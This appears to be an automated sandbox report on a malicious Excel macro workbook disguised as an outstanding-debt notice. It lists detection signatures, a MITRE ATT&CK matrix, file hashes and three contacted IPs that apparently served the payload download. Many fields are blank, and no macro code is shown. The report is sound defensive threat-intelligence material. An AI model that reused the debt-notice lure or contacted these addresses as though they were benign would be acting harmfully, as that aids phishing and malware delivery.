Analysis Report Outstanding-Debt-170373600-05042021.xlsm
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Source: | Memory has grown: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Document contains an embedded VBA macro which may execute processes | Show sources |
Source: | OLE, VBA macro: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | OLE, VBA macro line: | ||
Source: | OLE, VBA macro: |
Source: | OLE indicator, VBA macros: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window found: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting32 | Path Interception | Extra Window Memory Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting32 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Extra Window Memory Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs | Win32.Trojan.Generic |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
false |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
91.211.91.81 | unknown | Ukraine | 206638 | HOSTFORYUA | false | |
5.34.179.36 | unknown | Ukraine | 204957 | GREENFLOID-ASUA | false | |
45.153.229.23 | unknown | Russian Federation | 25229 | VOLIA-ASUA | false |
General Information |
---|
Joe Sandbox Version: | 32.0.0 Black Diamond |
Analysis ID: | 404124 |
Start date: | 04.05.2021 |
Start time: | 18:26:36 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | Outstanding-Debt-170373600-05042021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 24 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal60.expl.evad.winXLSM@1/9@0/3 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
91.211.91.81 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
5.34.179.36 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GREENFLOID-ASUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
HOSTFORYUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 134558 |
Entropy (8bit): | 5.368381132486292 |
Encrypted: | false |
SSDEEP: | 1536:ccQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:bEQ9DQW+zPXO8 |
MD5: | BDD3706CF64C73F0E59EC65E9572CE19 |
SHA1: | 6C5BD13614E90F4574FA90514FD22A5ABD929B40 |
SHA-256: | 2C64A8C2612EDEB63EEFEF55C71699D8FF462B5566E71B4E5C6B47A5BA518932 |
SHA-512: | 6B49BFA54BEF8DE5379AFE4B7C6B52E224B79BF85E61511789F142881E01935C538FDFA73E46D77DC90CD7FBF7DCA1B9F46CFD8CA7482C9145EC8C0D85AC29F1 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 92379 |
Entropy (8bit): | 7.654577060340879 |
Encrypted: | false |
SSDEEP: | 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0 |
MD5: | 4A425E6A5A885C0D0E2589506FD2244B |
SHA1: | E23482422480A4720E22F311B42BD65E2F3556F8 |
SHA-256: | 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160 |
SHA-512: | 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 119883 |
Entropy (8bit): | 7.6983593378299755 |
Encrypted: | false |
SSDEEP: | 3072:XypMvjkvKINbjvw548LMb/oqKO8NnS8+60Kcr+:CMbpAbT648LM7D98Np+EE+ |
MD5: | A8E3E57B3C916A2A211662C611E12DFE |
SHA1: | A17F4272F6143F31BDE4B193076EEBE6C5067DF3 |
SHA-256: | A5F8E43497C9FD0CCE0F28B84EBE6AA6E60ECC056807BD7A863ADBBEF7C3BD28 |
SHA-512: | EB5183CCCBBD826B3D2DAFB41AAED48955AAD5B8B1491164C3A22DD479863613925ABFF18CF02C6FB6240661A7B5A0D28FA085EA60EFF9CCECFC39347CF9D87E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 170164 |
Entropy (8bit): | 4.36485244490841 |
Encrypted: | false |
SSDEEP: | 1536:fXFQQULzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fXSg8WpFpKKHHedydFeo+oQLUlPoK0 |
MD5: | B3266C7F9A25B5565991670AF5B34534 |
SHA1: | 2B511F1A0DDF2E018B67E851C60E61DA273935A6 |
SHA-256: | FE8F730097F24BA1391F00766C8AAED59613C9593952DC42D168AF5EBBD14671 |
SHA-512: | 0F20A7E37CD6A2AE282504535B8840E0E32964B77CECCFD654A22737F8A763E160750E734F10C4C3165821F80DC3C726033FDD3FE081807638C3DB1D274E2C81 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 917 |
Entropy (8bit): | 4.648523373469656 |
Encrypted: | false |
SSDEEP: | 12:8QDC20UVRlHWCHod/lr5vmsDls8+WMjA+N/E2ybD8TIeYIe8k44t2Y+xIBjKZm:8QDly/ikls1AS8HDG7aB6m |
MD5: | 2188DB3030426B048DD160B0FB78B301 |
SHA1: | 7F7E8D0CF8878BB9348F6D67C36CC03E84189E26 |
SHA-256: | 2C56A01D8F9F6FDBD32436953962A1AA8CCE12E1B5BB95B5AD6070664A28061B |
SHA-512: | 0A25571DA6481858CA183E24DE2185BC8C4170E2981A8115E25C552D191605353AE2427C3DE6696F2EE96AEAD688A42F1A072B923FD28DB7BED72EE27D179193 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2396 |
Entropy (8bit): | 4.7135405638764105 |
Encrypted: | false |
SSDEEP: | 48:8/HV2dW1IdmBmBiB6p/HV2dW1IdmBmBiB6:8/125IuiK/125Iui |
MD5: | 68A244567A73F15E85C7A753971D9A7F |
SHA1: | 18879993BB6075461EB9A7F85BC10625B585BF75 |
SHA-256: | 933ACE80AB5E994F4B5D38B814FA01B544E3BFFE51AFF8E8E2893AE601D91203 |
SHA-512: | 06712E257D8692DE535AF0D0A8A69A9106822031A77A14996D17D38F4649B3E3020B6394DA3D1F2DD2C28CC04AA245FF9D0764A8839BF523DBD4B04CF6A3D44E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 171 |
Entropy (8bit): | 4.90833446852784 |
Encrypted: | false |
SSDEEP: | 3:bDesBVomxWhl2BbEUV3ZK6lyEW92BbEUV3ZK6lmxWhl2BbEUV3ZK6lv:bSsjSl2V317W92V31/l2V311 |
MD5: | 82671C66C1DCB4F772BA71A2EF39A2F3 |
SHA1: | BC7A7538E78B95C1DCD84A4D6DB1666DAFA8418A |
SHA-256: | 5ADC9C3AFD63F9527D4C69DCD2652601EA6048956E3464C41B3BC36FD158036A |
SHA-512: | 01A4B40A8244AC92218DB47FEFF51184544C1EF463E80DABF99EC7390F48122259DE4B1DE975C1EA4319037D21DB90581D0FFD6195D23385EC7A67AD6162F642 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 119879 |
Entropy (8bit): | 7.699263301974161 |
Encrypted: | false |
SSDEEP: | 3072:/4yF2HzI4t/OyvKINbjvw548LMb/oqKO8NnS8+60Kcr9:AHzleAbT648LM7D98Np+EE9 |
MD5: | 5DF3E6FA1F03C08E52BA6BFF03CBA311 |
SHA1: | 70BECCDF208552D75579BFD4573FE2321DFD9A01 |
SHA-256: | 6E988F7401B32F3AF913AE0B9D45B01E202437F7098A4C3BE5989E20C22D1EE5 |
SHA-512: | E06AAE0A09C6016884DFA5CD5CC50382A8D3F24B106282BF7681BEE3FCC2C7EBB8FC189E831F9C9A1338F6591AEFA74D15330AA35FB41C3C7CF980CFE5038C98 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.688559291002336 |
TrID: |
|
File name: | Outstanding-Debt-170373600-05042021.xlsm |
File size: | 116934 |
MD5: | 965c271faf86d03c634d62c30c54bbfe |
SHA1: | 541c52b418192627a3948a50ac3aeaf9441570f1 |
SHA256: | ca4072e5c04688b42b9fb306dc7d051260aef6266575b5be8a93e39d075b9abf |
SHA512: | 8f472677e881cd7fc7e16d1ccfb0b0dbbb9b5953e73624cc5830d14f09a482ed17763d497dde8d693ed60480b6749efa5baa54d885cf26fc21f4796602356f8b |
SSDEEP: | 3072:3kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:0AbT648LM7D98Np+EdECx |
File Content Preview: | PK..........!."..R....*.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/404124/sample/Outstanding-Debt-170373600-05042021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2021-05-04T08:11:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Blasr.bas, Stream Size: 1166 |
---|
General | |
---|---|
Stream Path: | VBA/Blasr |
VBA File Name: | Blasr.bas |
Stream Size: | 1166 |
